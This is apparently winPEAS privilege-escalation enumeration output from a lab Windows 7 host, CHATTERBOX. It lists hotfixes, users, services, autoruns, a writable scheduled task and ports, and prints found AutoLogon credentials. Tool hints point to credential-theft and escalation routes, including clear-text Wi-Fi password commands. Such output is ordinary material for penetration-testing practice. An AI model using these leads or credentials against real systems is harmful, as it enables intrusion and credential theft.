    Hotfixes: KB2849697, KB2849696, KB2841134, KB2670838, KB2830477, KB2592687, KB2479943, KB2491683, KB2506212, KB2506928, KB2509553, KB2532531, KB2533552, KB2533623, KB2534111, KB2545698, KB2547666, KB2552343, KB2560656, KB2563227, KB2564958, KB2574819, KB2579686, KB2585542, KB2604115, KB2620704, KB2621440, KB2631813, KB2639308, KB2640148, KB2647753, KB2653956, KB2654428, KB2656356, KB2660075, KB2667402, KB2676562, KB2685811, KB2685813, KB2685939, KB2690533, KB2698365, KB2705219, KB2719857, KB2726535, KB2727528, KB2729094, KB2731771, KB2732059, KB2732487, KB2736422, KB2742599, KB2750841, KB2758857, KB2761217, KB2763523, KB2770660, KB2773072, KB2786081, KB2799926, KB2800095, KB2807986, KB2808679, KB2813430, KB2820331, KB2834140, KB2836942, KB2836943, KB2840631, KB2843630, KB2847927, KB2852386, KB2853952, KB2857650, KB2861698, KB2862152, KB2862330, KB2862335, KB2864202, KB2868038, KB2871997, KB2882822, KB2884256, KB2888049, KB2891804, KB2892074, KB2893294, KB2893519, KB2894844, KB2900986, KB2908783, KB2911501, KB2912390, KB2918077, KB2919469, KB2923545, KB2931356, KB2937610, KB2943357, KB2952664, KB2965788, KB2966583, KB2968294, KB2970228, KB2972100, KB2972211, KB2973112, KB2973201, KB2973351, KB2977292, KB2978120, KB2978742, KB2984972, KB2984976, KB2985461, KB2991963, KB2992611, KB3003743, KB3004361, KB3004375, KB3006121, KB3006137, KB3010788, KB3011780, KB3013531, KB3019978, KB3020370, KB3020388, KB3021674, KB3021917, KB3022777, KB3023215, KB3030377, KB3031432, KB3035126, KB3037574, KB3042058, KB3045685, KB3046017, KB3046269, KB3054476, KB3055642, KB3059317, KB3060716, KB3061518, KB3067903, KB3068708, KB3071756, KB3072305, KB3074543, KB3075220, KB3075226, KB3076895, KB3078601, KB3078667, KB3080079, KB3080149, KB3084135, KB3086255, KB3092601, KB3092627, KB3093513, KB3097989, KB3101722, KB3102429, KB3107998, KB3108371, KB3108381, KB3108664, KB3109103, KB3109560, KB3110329, KB3115858, KB3118401, KB3122648, KB3123479, KB3126446, KB3126587, KB3127220, KB3133977, KB3137061, KB3138378, KB3138612, KB3138910, KB3139398, KB3139914, KB3140245, KB3147071, KB3150220, KB3150513, KB3155178, KB3156016, KB3156019, KB3159398, KB3161102, KB3161949, KB3161958, KB3172605, KB3177467, KB3179573, KB3184143, KB3185319, KB4014596, KB4019990, KB4040980, KB976902, KB982018, KB4054518, 

  [?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
    OS Build Number: 7601
   Windows version not supported


  [+] PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: 
    PS history size: 

  [+] Audit Settings
   [?] Check what is being logged 
    Not Found

  [+] WEF Settings
   [?] Windows Event Forwarding, is interesting to know were are sent the logs 
    Not Found

  [+] LAPS Settings
   [?] If installed, local administrator password is changed frequently and is restricted by ACL 
    LAPS Enabled: LAPS not installed

  [+] Wdigest
   [?] If enabled, plain-text crds could be stored in LSASS https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#wdigest
    Wdigest is not enabled

  [+] LSA Protection
   [?] If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#lsa-protection
    LSA Protection is not enabled

  [+] Credentials Guard
   [?] If enabled, a driver is needed to read LSASS memory https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#credential-guard
    CredentialGuard is not enabled

  [+] Cached Creds
   [?] If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#cached-credentials
    cachedlogonscount is 10

  [+] User Environment Variables
   [?] Check for some passwords or keys in the env variables 
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    USERDOMAIN: CHATTERBOX
    PROCESSOR_ARCHITECTURE: x86
    SystemDrive: C:
    PUBLIC: C:\Users\Public
    APPDATA: C:\Users\Alfred\AppData\Roaming
    windir: C:\Windows
    LOCALAPPDATA: C:\Users\Alfred\AppData\Local
    windows_tracing_flags: 3
    windows_tracing_logfile: C:\BVTBin\Tests\installpackage\csilogfile.log
    TMP: C:\Users\Alfred\AppData\Local\Temp
    USERPROFILE: C:\Users\Alfred
    ProgramFiles: C:\Program Files
    PROCESSOR_LEVEL: 23
    FP_NO_HOST_CHECK: NO
    HOMEPATH: \Users\Alfred
    COMPUTERNAME: CHATTERBOX
    USERNAME: Alfred
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_IDENTIFIER: x86 Family 23 Model 1 Stepping 2, AuthenticAMD
    SystemRoot: C:\Windows
    ComSpec: C:\Windows\system32\cmd.exe
    LOGONSERVER: \\CHATTERBOX
    TEMP: C:\Users\Alfred\AppData\Local\Temp
    CommonProgramFiles: C:\Program Files\Common Files
    PROCESSOR_REVISION: 0102
    PROMPT: $P$G
    ALLUSERSPROFILE: C:\ProgramData
    PSModulePath: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
    OS: Windows_NT
    ProgramData: C:\ProgramData
    HOMEDRIVE: C:

  [+] System Environment Variables
   [?] Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    FP_NO_HOST_CHECK: NO
    OS: Windows_NT
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: x86
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    PSModulePath: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 23
    PROCESSOR_IDENTIFIER: x86 Family 23 Model 1 Stepping 2, AuthenticAMD
    PROCESSOR_REVISION: 0102
    windows_tracing_logfile: C:\BVTBin\Tests\installpackage\csilogfile.log
    windows_tracing_flags: 3

  [+] HKCU Internet Settings
    IE5_UA_Backup_Flag: 5.0
    User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
    EmailName: User@
    PrivDiscUiShown: 1
    EnableHttp1_1: 1
    WarnOnIntranet: 1
    MimeExclusionListForCache: multipart/mixed multipart/x-mixed-replace multipart/x-byteranges 
    AutoConfigProxy: wininet.dll
    UseSchannelDirectly: System.Byte[]
    WarnOnPost: System.Byte[]
    UrlEncoding: 0
    SecureProtocols: 2688
    PrivacyAdvanced: 0
    ZonesSecurityUpgrade: System.Byte[]
    DisableCachingOfSSLPages: 0
    WarnonZoneCrossing: 0
    CertificateRevocation: 1
    EnableNegotiate: 1
    MigrateProxy: 1
    ProxyEnable: 0

  [+] HKLM Internet Settings
    EnablePunycode: 1
    CodeBaseSearchPath: CODEBASE
    WarnOnIntranet: 1
    MinorVersion: 0
    ActiveXCache: C:\Windows\Downloaded Program Files

  [+] Drives Information
   [?] Remember that you should search more info inside the other drives 
    A:\ (Type: Removable)
    C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 16 GB)(Permissions: Authenticated Users [AppendData/CreateDirectories])
    D:\ (Type: CDRom)

  [+] AV Information
    No AV was detected!!
    Not Found

  [+] UAC Status
   [?] If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy: 
    FilterAdministratorToken: 0
      [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
      [-] Only the RID-500 local admin account can be used for lateral movement.


  ===========================================(Users Information)===========================================

  [+] Users
   [?] Check if you have some admin equivalent privileges https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups
  Current user: Alfred
  Current groups: Domain Users, Everyone, Users, Interactive, Console Logon, Authenticated Users, This Organization, Local account, Local, NTLM Authentication
   =================================================================================================

    CHATTERBOX\Administrator: Built-in account for administering the computer/domain
        |->Groups: Administrators
        |->Password: CanChange-NotExpi-Req

    CHATTERBOX\Alfred
        |->Groups: Users
        |->Password: CanChange-Expi-Req

    CHATTERBOX\Guest(Disabled): Built-in account for guest access to the computer/domain
        |->Groups: Guests
        |->Password: NotChange-NotExpi-NotReq


  [+] Current Token privileges
   [?] Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation
    SeShutdownPrivilege: DISABLED
    SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeUndockPrivilege: DISABLED
    SeIncreaseWorkingSetPrivilege: DISABLED
    SeTimeZonePrivilege: DISABLED

  [+] Clipboard text


  [+] Logged users
    CHATTERBOX\Alfred

  [+] RDP Sessions
    SessID    pSessionName   pUserName      pDomainName              State     SourceIP
    1         Console        Alfred         CHATTERBOX               Active    33.0.52.83

  [+] Ever logged users
    CHATTERBOX\Administrator
    CHATTERBOX\Alfred

  [+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found!!
    DefaultUserName               :  Alfred
    DefaultPassword               :  Welcome1!

  [+] Home folders found
    C:\Users\Administrator : Alfred [AllAccess]
    C:\Users\Alfred : Alfred [AllAccess]
    C:\Users\All Users
    C:\Users\Default
    C:\Users\Default User
    C:\Users\Public : Interactive [WriteData/CreateFiles]

  [+] Password Policies
   [?] Check for a possible brute-force 
  [X] Exception: System.OverflowException: Negating the minimum value of a twos complement number is invalid.
   at System.TimeSpan.op_UnaryNegation(TimeSpan t)
   at winPEAS.UserInfo.GetPasswordPolicy()
    Domain: Builtin
    SID: S-1-5-32
    MaxPasswordAge: 42.22:47:31.7437440
    MinPasswordAge: 00:00:00
    MinPasswordLength: 0
    PasswordHistoryLength: 0
    PasswordProperties: 0
   =================================================================================================



  =======================================(Processes Information)=======================================

  [+] Interesting Processes -non Microsoft-
   [?] Check if any interesting proccesses for memmory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes
  [X] Exception: System.Runtime.InteropServices.COMException (0x80070006): The handle is invalid. (Exception from HRESULT: 0x80070006 (E_HANDLE))
   at System.Runtime.InteropServices.Marshal.ThrowExceptionForHRInternal(Int32 errorCode, IntPtr errorInfo)
   at System.Runtime.InteropServices.Marshal.FreeHGlobal(IntPtr hglobal)
   at winPEAS.SamServer.UNICODE_STRING.Dispose(Boolean disposing)
    dwm(1772)[C:\Windows\system32\Dwm.exe] -- POwn: Alfred
    Command Line: "C:\Windows\system32\Dwm.exe"
   =================================================================================================

    wuauclt(808)[C:\Windows\system32\wuauclt.exe] -- POwn: Alfred
    Command Line: "C:\Windows\system32\wuauclt.exe"
   =================================================================================================

    explorer(1828)[C:\Windows\Explorer.EXE] -- POwn: Alfred
    Command Line: C:\Windows\Explorer.EXE
   =================================================================================================

    winPEAS(9496)[C:\Users\Alfred\AppData\Local\Temp\winPEAS.exe] -- POwn: Alfred -- isDotNet
    Permissions: Alfred [AllAccess]
    Possible DLL Hijacking folder: C:\Users\Alfred\AppData\Local\Temp (Alfred [AllAccess])
    Command Line: winPEAS.exe
   =================================================================================================

    dinotify(1912)[C:\Windows\System32\dinotify.exe] -- POwn: Alfred
    Command Line: "C:\Windows\System32\dinotify.exe" pnpui.dll,SimplifiedDINotification
   =================================================================================================

    AChat(9336)[c:\Program Files\AChat\AChat.exe] -- POwn: Alfred
    Command Line: "c:\Program Files\AChat\AChat.exe" 
   =================================================================================================

    conhost(9208)[C:\Windows\system32\conhost.exe] -- POwn: Alfred
    Command Line: \??\C:\Windows\system32\conhost.exe "11292863241121822812-584336463-833061963399883897910220430-647914284-1372952933
   =================================================================================================

    taskeng(2864)[C:\Windows\system32\taskeng.exe] -- POwn: Alfred
    Command Line: taskeng.exe {8250A68D-00F6-4764-B374-77200D7C490C}
   =================================================================================================

    vmtoolsd(712)[C:\Program Files\VMware\VMware Tools\vmtoolsd.exe] -- POwn: Alfred
    Command Line: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
   =================================================================================================

    rundll32(1172)[C:\Windows\system32\rundll32.exe] -- POwn: Alfred
    Command Line: rundll32.exe C:\Windows\system32\newdev.dll,pDiDeviceInstallNotification \\.\pipe\PNP_Device_Install_Pipe_1.{2520bf4f-c661-41e7-a103-f5a3d3aacf97} "(null)"
   =================================================================================================

    slui(3848)[C:\Windows\System32\slui.exe] -- POwn: Alfred
    Command Line: C:\Windows\System32\slui.exe -Embedding
   =================================================================================================

    cmd(8824)[C:\Windows\system32\cmd.exe] -- POwn: Alfred
    Command Line: cmd
   =================================================================================================

    taskhost(1436)[C:\Windows\system32\taskhost.exe] -- POwn: Alfred
    Command Line: "taskhost.exe"
   =================================================================================================



  ========================================(Services Information)========================================

  [+] Interesting Services -non Microsoft-
   [?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    TPAutoConnSvc(ThinPrint GmbH - TP AutoConnect Service)["C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe"] - Manual - Stopped
    ThinPrint component for creating printers or connecting printer shares automatically.
   =================================================================================================

    TPVCGateway(Cortado AG - TP VC Gateway Service)["C:\Program Files\VMware\VMware Tools\TPVCGateway.exe"] - Manual - Stopped
    ThinPrint component that receives print data from dedicated print servers and forwards it to ThinPrint ICA/RDP Clients.
   =================================================================================================

    VGAuthService(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Auto - Running
    Alias Manager and Ticket Service
   =================================================================================================

    VMTools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Auto - Running
    Provides support for synchronizing objects between the host and guest operating systems.
   =================================================================================================

    VMware Physical Disk Helper Service(VMware, Inc. - VMware Physical Disk Helper Service)["C:\Program Files\VMware\VMware Tools\vmacthlp.exe"] - Auto - Running
    Enables support for running virtual machines from a physical disk partition
   =================================================================================================


  [+] Modifiable Services
   [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    You cannot modify any service

  [+] Looking if you can modify any service registry
   [?] Check if you can modify the registry of a service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services-registry-permissions
    [-] Looks like you cannot change the registry of any service...

  [+] Checking write permissions in PATH folders (DLL Hijacking)
   [?] Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking
    C:\Windows\system32
    C:\Windows
    C:\Windows\System32\Wbem
    C:\Windows\System32\WindowsPowerShell\v1.0\


  ====================================(Applications Information)====================================

  [+] Current Active Window Application
    Optional update delivery is not working

  [+] Installed Applications --Via Program Files/Uninstall registry--
   [?] Check if you can modify installed software https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
Error: System.IO.DirectoryNotFoundException: Could not find a part of the path 'C:\Program Files (x86)'.
   at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
   at System.IO.FileSystemEnumerableIterator`1.CommonInit()
   at System.IO.FileSystemEnumerableIterator`1..ctor(String path, String originalUserPath, String searchPattern, SearchOption searchOption, SearchResultHandler`1 resultHandler, Boolean checkHost)
   at System.IO.Directory.GetFiles(String path)
   at winPEAS.ApplicationInfo.GetInstalledAppsPermsPath(String fpath)
    C:\Program Files\AChat
    C:\Program Files\Common Files
    C:\Program Files\desktop.ini
    C:\Program Files\DVD Maker
    C:\Program Files\Internet Explorer
    C:\Program Files\Microsoft.NET
    C:\Program Files\MSBuild
    C:\Program Files\Reference Assemblies
    C:\Program Files\Uninstall Information
    C:\Program Files\VMware
    C:\Program Files\Windows Defender
    C:\Program Files\Windows Mail
    C:\Program Files\Windows Media Player
    C:\Program Files\Windows NT
    C:\Program Files\Windows Photo Viewer
    C:\Program Files\Windows Portable Devices
    C:\Program Files\Windows Sidebar
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\SetupCache\v4.7.02053


  [+] Autorun Applications
   [?] Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries

    RegPath: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Key: VMware User Process
    Folder: C:\Program Files\VMware\VMware Tools
    File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr (Unquoted and Space detected)
   =================================================================================================


    RegPath: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    RegPerms: Alfred [TakeOwnership]
    Key: AChat
    Folder: c:\Program Files\AChat
    File: c:\Program Files\AChat\AChat.exe /startup (Unquoted and Space detected)
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    Key: Common Startup
    Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup (Unquoted and Space detected)
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
    Key: Common Startup
    Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup (Unquoted and Space detected)
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Key: Userinit
    Folder: C:\Windows\system32
    File: C:\Windows\system32\userinit.exe,
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Key: Shell
    Folder: None (PATH Injection)
    File: explorer.exe
   =================================================================================================


    RegPath: HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
    Key: AlternateShell
    Folder: None (PATH Injection)
    File: cmd.exe
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers
    Key: Adobe Type Manager
    Folder: None (PATH Injection)
    File: atmfd.dll
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Classes\htmlfile\shell\open\command
    Folder: C:\Program Files\Internet Explorer
    File: C:\Program Files\Internet Explorer\iexplore.exe %1 (Unquoted and Space detected)
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}
    Key: StubPath
    Folder: C:\Windows\system32\regsvr32.exe\s\n\i:\UserInstall C:\Windows\system32
    File: C:\Windows\system32\regsvr32.exe /s /n /i:/UserInstall C:\Windows\system32\themeui.dll (Unquoted and Space detected)
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}
    Key: StubPath
    Folder: C:\Program Files\Windows Mail
    File: C:\Program Files\Windows Mail\WinMail.exe OCInstallUserConfigOE (Unquoted and Space detected)
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{66C64F22-FC60-4E6C-A6B5-F0D580E680CE}
    Key: StubPath
    Folder: C:\Windows\System32
    File: C:\Windows\System32\ie4uinit.exe -EnableTLS
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}
    Key: StubPath
    Folder: C:\Windows\system32
    File: C:\Windows\system32\unregmp2.exe /FirstLogon /Shortcuts /RegBrowsers /ResetMUI
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{7D715857-A67C-4C2F-A929-038448584D63}
    Key: StubPath
    Folder: C:\Windows\System32
    File: C:\Windows\System32\ie4uinit.exe -DisableSSL3
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}
    Key: StubPath
    Folder: regsvr32.exe\s\n
    File: regsvr32.exe /s /n /i:U shell32.dll (Unquoted and Space detected)
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}
    Key: StubPath
    Folder: C:\Windows\System32
    File: C:\Windows\System32\ie4uinit.exe -UserConfig
   =================================================================================================


    RegPath: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
    Key: StubPath
    Folder: C:\Windows\system32
    File: C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install
   =================================================================================================


    Folder: C:\Users\Alfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
    FolderPerms: Alfred [AllAccess]
    File: C:\Users\Alfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
    FilePerms: Alfred [AllAccess]
   =================================================================================================


    Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
    File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
   =================================================================================================


    Key: From WMIC
    Folder: c:\Program Files\AChat
    File: c:\Program Files\AChat\AChat.exe /startup
   =================================================================================================


    Key: From WMIC
    Folder: C:\Program Files\VMware\VMware Tools
    File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr
   =================================================================================================


  [+] Scheduled Applications --Non Microsoft--
   [?] Check if you can modify other users scheduled binaries https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
    (CHATTERBOX\Alfred) Reset AChat service: "C:\Users\Alfred\AppData\Local\Microsoft\Windows Media\reset.bat" 
    Permissions file: Alfred [AllAccess]
    Permissions folder(DLL Hijacking): Alfred [AllAccess]
    Trigger: At 5:10 PM on 1/30/2018-After triggered, repeat every 00:01:00 indefinitely.
             At 5:10 PM on 1/30/2018-After triggered, repeat every 00:01:00 indefinitely.
             At 5:10 PM on 1/30/2018-After triggered, repeat every 00:01:00 indefinitely.
    
   =================================================================================================


  [+] Device Drivers --Non Microsoft--
   [?] Check 3rd party drivers for known vulnerabilities/rootkits. https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#vulnerable-drivers
    VMware PCI VMCI Bus Device - 9.8.6.0 build-3966680 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmci.sys
    VMware vSockets Service - 9.8.8.0 build-4037350 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vsock.sys
    Microsoftr Windowsr Operating System - 6.1.7083.0 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\system32\drivers\lsi_scsi.sys
    Microsoftr Windowsr Operating System - 6.1.7100.4100 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\system32\drivers\lsi_sas.sys
    VMware PVSCSI miniport driver (32-bit) - 1.3.8.0 build-3482537 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\pvscsi.sys
    Storage Filter Driver - 1.1.2.5 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\system32\drivers\amdxata.sys
    VMware Raw Disk Helper Driver - 1.1.0.0 build-3625720 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmrawdsk.sys
    VMware Pointing PS/2 Device Driver - 12.5.7.0 build-3574480 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmmouse.sys
    VMware SVGA 3D - 8.15.01.0051 - build-5479029 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vm3dmp.sys
    Intel(R) PRO/1000 Adapter - 8.4.1.0 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\E1G60I32.sys
    VMware Pointing USB Device Driver - 12.5.7.0 build-3574480 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmusbmouse.sys
    VMware server memory controller - 7.4.2.0 build-5980934 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmmemctl.sys
    VMware HGFS File System Driver - 11.0.14.2 build-3966992 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmhgfs.sys


  =========================================(Network Information)=========================================

  [+] Network Shares
    ADMIN$ (Path: C:\Windows)
    C$ (Path: C:\)
    IPC$ (Path: )

  [+] Host File

  [+] Network Ifaces and known hosts
   [?] The masks are only for the IPv4 addresses 
  [X] Exception: The requested protocol has not been configured into the system, or no implementation for it exists
    Local Area Connection[00:50:56:B9:D3:AA]: 10.10.10.74 / 255.255.255.0
        Gateways: 10.10.10.2
        DNSs: 10.10.10.2
    Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0
        DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1

  [+] Current Listening Ports
   [?] Check for services restricted from the outside 
    Proto     Local Address          Foreign Address        State
    TCP       0.0.0.0:135                                   Listening
    TCP       0.0.0.0:445                                   Listening
    TCP       0.0.0.0:49152                                 Listening
    TCP       0.0.0.0:49153                                 Listening
    TCP       0.0.0.0:49154                                 Listening
    TCP       0.0.0.0:49155                                 Listening
    TCP       0.0.0.0:49156                                 Listening
    TCP       10.10.10.74:139                               Listening
    TCP       10.10.10.74:9255                              Listening
    TCP       10.10.10.74:9256                              Listening
    TCP       [::]:135                                      Listening
    TCP       [::]:445                                      Listening
    TCP       [::]:49152                                    Listening
    TCP       [::]:49153                                    Listening
    TCP       [::]:49154                                    Listening
    TCP       [::]:49155                                    Listening
    TCP       [::]:49156                                    Listening
    UDP       0.0.0.0:123                                   Listening
    UDP       0.0.0.0:500                                   Listening
    UDP       0.0.0.0:4500                                  Listening
    UDP       0.0.0.0:5355                                  Listening
    UDP       10.10.10.74:137                               Listening
    UDP       10.10.10.74:138                               Listening
    UDP       10.10.10.74:1900                              Listening
    UDP       10.10.10.74:9256                              Listening
    UDP       127.0.0.1:1900                                Listening
    UDP       127.0.0.1:58920                               Listening
    UDP       [::]:123                                      Listening
    UDP       [::]:500                                      Listening
    UDP       [::1]:1900                                    Listening
    UDP       [::1]:58919                                   Listening

  [+] Firewall Rules
   [?] Showing only DENY rules (too many ALLOW rules always) 
    Current Profiles: PUBLIC
    FirewallEnabled (Domain):    True
    FirewallEnabled (Private):    True
    FirewallEnabled (Public):    True
    DENY rules:
    (4)Notepad[C:\windows\system32\notepad.exe]: DENY UDP IN from *:* --> *:*
    Notepad
    (4)Notepad[C:\windows\system32\notepad.exe]: DENY TCP IN from *:* --> *:*
    Notepad

  [+] DNS cached --limit 70--
    Entry                                 Name                                  Data
  [X] 'MSFT_DNSClientCache' WMI class unavailable (minimum supported versions of Windows: 8/2012)


  =========================================(Windows Credentials)=========================================

  [+] Checking Windows Vault
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-manager-windows-vault
    Not Found

  [+] Checking Credential manager
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-manager-windows-vault
    This function is not yet implemented.
    [i] If you want to list credentials inside Credential Manager use 'cmdkey /list'

  [+] Saved RDP connections
    Not Found

  [+] Recently run commands
    Not Found

  [+] PS default transcripts history
    [i] Read the PS histpry inside these files (if any)

  [+] Checking for DPAPI Master Keys
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
    MasterKey: C:\Users\Alfred\AppData\Roaming\Microsoft\Protect\S-1-5-21-1218242403-4263168573-589647361-1000\c5157b70-3de1-4f1b-8f9d-e636ae1698d3
    Accessed: 12/10/2017 9:18:26 AM
    Modified: 12/10/2017 9:18:26 AM
   =================================================================================================


  [+] Checking for Credential Files
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
    Not Found

  [+] Checking for RDCMan Settings Files
   [?] Dump credentials from Remote Desktop Connection Manager https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager
    Not Found

  [+] Looking for kerberos tickets
   [?]  https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88
    Not Found

  [+] Looking saved Wifis
    This function is not yet implemented.
    [i] If you want to list saved Wifis connections you can list the using 'netsh wlan show profile'
    [i] If you want to get the clear-text password use 'netsh wlan show profile <SSID> key=clear'

  [+] Looking AppCmd.exe
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
    Not Found

  [+] Looking SSClient.exe
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#scclient-sccm
    Not Found

  [+] Checking AlwaysInstallElevated
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
    AlwaysInstallElevated isn't available

  [+] Checking WSUS
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
    Not Found


  ========================================(Browsers Information)========================================

  [+] Looking for Firefox DBs
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
    Not Found

  [+] Looking for GET credentials in Firefox history
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
    Not Found

  [+] Looking for Chrome DBs
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
    Not Found

  [+] Looking for GET credentials in Chrome history
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
